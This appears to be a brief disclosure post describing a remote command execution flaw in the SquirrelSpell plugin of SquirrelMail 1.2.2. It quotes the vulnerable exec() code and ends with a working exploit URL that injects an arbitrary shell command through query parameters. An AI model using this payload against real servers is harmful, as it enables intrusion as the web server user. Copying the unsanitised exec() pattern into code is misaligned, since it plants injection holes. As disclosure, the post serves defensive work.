Squirrelmail remote execute commands bug Version Affected : 1.2.2 Squirrelmail is a webmail system, which allows users to send, get, read etc. mails. It has some themes, plugins etc. One of the plugins has a very interesting piece of code : from file check_me.mod.php : $sqspell_command = $SQSPELL_APP[$sqspell_use_app]; ... $floc = "$attachment_dir/$username_sqspell_data.txt"); ... exec ("cat $floc | $sqspell_command", $sqspell_output); Everything should be ok, but where this page includes config files, where are defined $attachment_dir and others ? Answer: Nowhere. We can set up variables $sqspell_command and $floc. Result ? We can execute any command of course as a http serwer owner. Exploit : host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall% 20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik <appelast@bsquad.sm.pl>